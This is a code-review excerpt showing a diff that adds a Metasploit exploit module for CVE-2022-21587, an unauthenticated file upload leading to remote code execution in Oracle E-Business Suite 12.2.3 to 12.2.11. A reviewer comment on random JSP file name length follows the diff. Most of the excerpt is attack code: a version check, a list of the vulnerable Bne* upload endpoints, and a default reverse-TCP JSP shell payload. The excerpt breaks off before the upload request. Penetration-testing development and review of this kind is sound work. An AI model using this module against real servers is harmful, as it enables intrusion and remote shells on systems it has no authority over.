modules/exploits/linux/http/oracle_ebs_rce_cve_2022_21587.rb

```diff
@@ -0,0 +1,142 @@
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Oracle E-Business Suite (EBS) Arbitrary File Upload',
+        'Description' => %q{
+          This module exploits an arbitrary file upload vulnerability in Oracle Web Applications
+          Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in
+          order to gain remote code execution.
+        },
+        'Author' => [
+          'sf', # MSF Exploit & Rapid7 Analysis
+          'HMs', # Python PoC
+          'l1k3beef', # Original Discoverer
+        ],
+        'References' => [
+          ['CVE', '2022-21587'],
+          ['URL', 'https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis'],
+          ['URL', 'https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/'],
+          ['URL', 'https://github.com/hieuminhnv/CVE-2022-21587-POC']
+        ],
+        'DisclosureDate' => '2022-10-01',
+        'License' => MSF_LICENSE,
+        'Platform' => %w[linux],
+        'Arch' => ARCH_JAVA,
+        'Privileged' => false, # Code execution as user 'oracle'
+        'Targets' => [
+          [
+            'Oracle EBS on Linux',
+            {
+              'Platform' => 'linux',
+              'EBSBasePath' => '/u01/install/APPS/fs1/',
+              'EBSFormsPath' => 'FMW_Home/Oracle_EBS-app1/applications/forms/forms/',
+              'DirTraversalDepth' => 5
+            }
+          ]
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8000)
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/OA_HTML/FrmReportData'
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return CheckCode::Unknown unless res.code == 200
+
+    m = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})
+
+    if m && (m.length == 2)
+      version = Rex::Version.new(m[1].gsub('_', '.'))
+
+      if version.between?(Rex::Version.new('12.2.3'), Rex::Version.new('12.2.11'))
+        return CheckCode::Appears("Oracle EBS version #{version} detected.")
+      end
+
+      return CheckCode::Safe("Oracle EBS version #{version} detected.")
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    endpoints = %w[BneViewerXMLService BneDownloadService BneOfflineLOVService BneUploaderService]
+
+    target_url = "/OA_HTML/#{endpoints.sample}"
+
+    print_status("Targeting the endpoint: #{target_url}")
+
+    jsp_name = Rex::Text.rand_text_alpha_lower(1..8) + '.jsp'
```

Comment:
```suggestion
    jsp_name = Rex::Text.rand_text_alpha_lower(3..8) + '.jsp'
```

Unlikely but potential file clashes on low character count file names.